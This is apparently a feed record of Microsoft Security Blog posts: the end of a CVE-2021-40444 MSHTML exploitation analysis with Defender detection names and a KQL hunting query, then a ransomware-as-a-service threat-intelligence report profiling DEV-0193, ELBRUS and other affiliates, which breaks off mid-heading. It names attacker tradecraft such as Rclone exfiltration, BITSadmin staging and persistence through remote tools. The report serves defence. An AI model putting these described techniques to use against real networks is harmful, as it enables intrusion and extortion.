[Trojan:Win32/CplLoader.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/CplLoader.A&threatId=-2147178092>) \u2013 Blocks Rundll32/Control abuse used in this CVE exploitation\n * [Behavior:Win32/OfficeMhtInj.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/OfficeMhtInj.A&threatId=-2147178094>) \u2013 Detects the injection into wabmig.exe\n * 
[TrojanDownloader:O97M/Donoff.SA!CAB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!CAB&threatId=-2147173661>) \u2013 Detects CAB files in observed attacks\n * [TrojanDownloader:O97M/Donoff.SA!Gen](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!Gen&threatId=-2147173660>) \u2013 Detects Office documents in observed attacks\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Possible exploitation of CVE-2021-40444 (requires Defender Antivirus as the Active AV)\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious Behavior By Office Application (detects the anomalous process launches that happen in exploitation of this CVE, and other malicious behavior)\n * Suspicious use of Control Panel item\n\n**Microsoft Defender for Office 365**\n\nMicrosoft Defender for Office 365 detects exploit documents delivered via email when detonation is enabled using the following detection names:\n\n * Trojan_DOCX_OLEAnomaly_A \n * Description = "The sample is an Office document which contains a suspicious oleobject definition."\n * Trojan_DOCX_OLEAnomaly_AB \n * Description = "The sample is an Office document which exhibits malicious template injection qualities."\n * Exploit_Office_OleObject_A \n * Description = "This sample is an Office document which exhibits malicious qualities."\n * Exploit_Office_OleObject_B \n * Description = "This sample is an Office document which exhibits malicious qualities."\n\nThe following alerts in your portal indicate that a malicious attachment has been blocked, although these alerts are also used for many different threats:\n\n 
* Malware campaign detected and blocked\n * Malware campaign detected after delivery\n * Email messages containing malicious file removed after delivery\n\n## Advanced hunting\n\nTo locate possible exploitation activity, run the following queries.\n\n**Relative path traversal (requires Microsoft 365 Defender)**\n\nUse the following query to surface abuse of Control Panel objects (.cpl) via URL protocol handler path traversal as used in the original attack and public proof of concepts at time of publishing:\n\n`DeviceProcessEvents \n| where (FileName in~('control.exe','rundll32.exe') and ProcessCommandLine has '.cpl:') \nor ProcessCommandLine matches regex @'\\\"\\.[a-zA-Z]{2,4}:\\.\\.\\/\\.\\.'`\n\n**Azure Sentinel**\n\nTo locate possible attacks that exploit CVE-2021-40444, Azure Sentinel customers can leverage the following detection query: [Azure Sentinel MSHTML exploit detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/MSHTMLVuln.yaml>).\n\n \n\nThe post [Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-09-15T23:40:56", "type": "mmpc", "title": "Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-15T23:40:56", "id": "MMPC:795E0A765679492C51FEFA2B19EAD597", "href": "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T16:00:24", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. 
Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. 
We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2019t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. 
Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. 
Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. 
This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. 
\n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. 
The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services.\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. 
Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. 
Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. 
\n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. 
Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attacker is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. 
Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privileged access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access and a hands-on-keyboard deployment can vary wildly depending on the groups and their workloads or motivations. 
Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware-associated threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. 
In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. 
We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. 
Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. 
This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and REvil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. 
The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very true of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. 
DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. 
Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. 
DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d part